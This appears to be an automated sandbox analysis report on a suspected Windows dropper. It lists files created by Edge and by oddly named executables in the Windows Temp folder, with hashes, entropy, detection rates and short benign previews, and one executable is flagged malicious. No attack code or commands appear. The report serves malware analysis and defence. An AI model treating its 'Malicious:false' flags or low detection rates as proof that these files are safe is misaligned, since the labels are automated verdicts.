                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):11406
                                                                                                                                                                                                                                                                          Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                          MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                          SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                          SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                          SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                          Malicious:false
Preview:[{"description":"treehash per file","signed_content":{"payload":"
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):854
                                                                                                                                                                                                                                                                          Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                          MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                          SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                          SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                          SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2525
                                                                                                                                                                                                                                                                          Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                          MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                          SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                          SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                          SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):97
                                                                                                                                                                                                                                                                          Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                          MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                          SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                          SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                          SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):122218
                                                                                                                                                                                                                                                                          Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                          MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                          SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                          SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                          SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):291
                                                                                                                                                                                                                                                                          Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                          MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                          SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                          SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                          SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):130866
                                                                                                                                                                                                                                                                          Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                          MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                          SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                          SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                          SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2598912
                                                                                                                                                                                                                                                                          Entropy (8bit):6.6049974235008655
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
                                                                                                                                                                                                                                                                          MD5:FECC62A37D37D9759E6B02041728AA23
                                                                                                                                                                                                                                                                          SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
                                                                                                                                                                                                                                                                          SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
                                                                                                                                                                                                                                                                          SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):8581632
                                                                                                                                                                                                                                                                          Entropy (8bit):6.736578346160889
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                                                                                                                                                                                                          MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                                                                                                                                                                                                          SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                                                                                                                                                                                                          SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                                                                                                                                                                                                          SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1053696
                                                                                                                                                                                                                                                                          Entropy (8bit):6.539052666912709
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                                                                                                                                                                                                          MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                                                                                                                                                                                                          SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                                                                                                                                                                                                          SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                                                                                                                                                                                                          SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):356352
                                                                                                                                                                                                                                                                          Entropy (8bit):6.447802510709224
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                                                                                                                                                                                                          MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                                                                                                                                                                                                          SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                                                                                                                                                                                                          SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                                                                                                                                                                                                          SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):6487736
                                                                                                                                                                                                                                                                          Entropy (8bit):7.518089126573906
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                                                                                                                                                                                                          MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                                                                                                                          SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                                                                                                                                                                                                          SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                                                                                                                                                                                                          SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):664064
                                                                                                                                                                                                                                                                          Entropy (8bit):6.953961612144461
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
                                                                                                                                                                                                                                                                          MD5:A147F46E2E1F315AA219482D645BEED9
                                                                                                                                                                                                                                                                          SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
                                                                                                                                                                                                                                                                          SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
                                                                                                                                                                                                                                                                          SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60283
                                                                                                                                                                                                                                                                          Entropy (8bit):4.569551839311306
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
                                                                                                                                                                                                                                                                          MD5:3620E2D48EB60EC875FB9262ABC87D2B
                                                                                                                                                                                                                                                                          SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
                                                                                                                                                                                                                                                                          SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
                                                                                                                                                                                                                                                                          SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):421200
                                                                                                                                                                                                                                                                          Entropy (8bit):6.59808962341698
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                                                                                                                                                                                                          MD5:03E9314004F504A14A61C3D364B62F66
                                                                                                                                                                                                                                                                          SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                                                                                                                                                                                                          SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                                                                                                                                                                                                          SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):770384
                                                                                                                                                                                                                                                                          Entropy (8bit):6.908020029901359
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                                                                                                                                                                                                          MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                                                                                                                                                                                                          SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                                                                                                                                                                                                          SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                                                                                                                                                                                                          SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4485813
                                                                                                                                                                                                                                                                          Entropy (8bit):7.960501110953352
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:zvf5BQTYhbOg6IdJogvR31mRCbJ2O4qm08UhFdFtZ7C5Bd6wKWgSKNKk8R:zvhy2cW31mRCbEqf8UhFiBdQ+kO
                                                                                                                                                                                                                                                                          MD5:B56FE6EA5F9CAFB0C73A95A3377C8CA1
                                                                                                                                                                                                                                                                          SHA1:252F48E39D28A5554152F32F23A406E4E9E752DD
                                                                                                                                                                                                                                                                          SHA-256:04C5B808B740AC5F17B12956AD0D1B2C21EA1D6A6011275AC2A0D08B454EDB6A
                                                                                                                                                                                                                                                                          SHA-512:1A094CD5029F1D2BD0E804EC7F1911CF25CE319BEF3EB03BC57DF09A5BCF5957C813F9F7FF57B936F0596E0E00F3B447E2E2C3B5BAE9F3AD99BEB63C441DC0D7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):474056
                                                                                                                                                                                                                                                                          Entropy (8bit):6.5454050911466695
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:ljzSlYxJd1mGgLzDxlzLIQNO1fc2G0LqR6tA15/5K+su:BzMz/VNUch0LqR6850lu
                                                                                                                                                                                                                                                                          MD5:494C74C13C1E2E81E77240CC64F09206
                                                                                                                                                                                                                                                                          SHA1:19C172D3B470F199EA50F7E71104CF30C538F351
                                                                                                                                                                                                                                                                          SHA-256:DD8FA081CA5F7238C755C9D6E42F5A8ACA6F90B10412D4092EDA1DE6F76D8FF7
                                                                                                                                                                                                                                                                          SHA-512:D76FA86BA474935809A057082E0C41C3CC7008477D0D8A035C4E77245BEBD9051B329BC07FD44FEC0FCF18B0C0779D60A497B36818C4A9815D7942DF8BE71672
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (450), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2384
                                                                                                                                                                                                                                                                          Entropy (8bit):3.7598071625620997
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:y+03N6hOOvpEkwcne1LaJVc0wkycmeRPwJvgkWHmi1qrBZi1Hymrcl:Rwcn6Lwc0wkyc/Puvgk/WqrBZWSmrq
                                                                                                                                                                                                                                                                          MD5:31320EA56CB0843809C37D1C6F0D6AF1
                                                                                                                                                                                                                                                                          SHA1:53176DCF526AFADC71815A2A8404AFEC35C5452C
                                                                                                                                                                                                                                                                          SHA-256:470FF6E6A66EDCA04C8E9525B22B2B8E8F94C7CDB814EA2CCDB037E276B2F6D8
                                                                                                                                                                                                                                                                          SHA-512:75C0C4F7CC2A5E1424CFE3970F0DEC1394E21EC316D247ED0B78DAC8E03FABE46E290692B70C7707F85AA63F6F2DD75C0302237D8A5677E2A753AA60465D38E2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-16"?>
                                                                                                                                                                                                                                                                          <BootstrapperApplicationData xmlns="http://wixtoolset.org/schemas/v4/BootstrapperApplicationData">
                                                                                                                                                                                                                                                                            <WixBundleProperties DisplayName="Rubrician" LogPathVariable="WixBundleLog" Compressed="no" Id="{73FA97B8-5FC7-43DA-983E-7EC402A046D6}" UpgradeCode="{08609119-8A30-4126-933A-76D50C9AE837}" PerMachine="yes" />
                                                                                                                                                                                                                                                                            <WixRollbackBoundary Id="WixDefaultBoundary" Vital="yes" Transaction="no" />
                                                                                                                                                                                                                                                                            <WixPackageProperties Package="Paxwax" Vital="yes" DisplayName="
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):252
                                                                                                                                                                                                                                                                          Entropy (8bit):3.50802487441866
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:QFulcLk0YR5Ie8GcUlLulFwENeWlYmH1fMWGVUlLulFwEnk:QF/LXYRWe8OLqF3Ye1kWGaLqFhk
                                                                                                                                                                                                                                                                          MD5:A35990570AFAA7D023FD2EBBE229AFB8
                                                                                                                                                                                                                                                                          SHA1:86688B13D3364ADB90BBA552F544D4D546AFD63D
                                                                                                                                                                                                                                                                          SHA-256:9B696AD0EC3B37BAC11DA76BCD51AD907D31EE9638DAD7BB8FDD5AEF919EF621
                                                                                                                                                                                                                                                                          SHA-512:1845B25697FED6D694428F53B2D1B2ABF1ACF8A09E8E49A536759822AD5B1A75D51BC7AE4D73E435B7BBC23AC34C9AED76F17414D218B54DA546C908F9A5182C
                                                                                                                                                                                                                                                                          Malicious:false
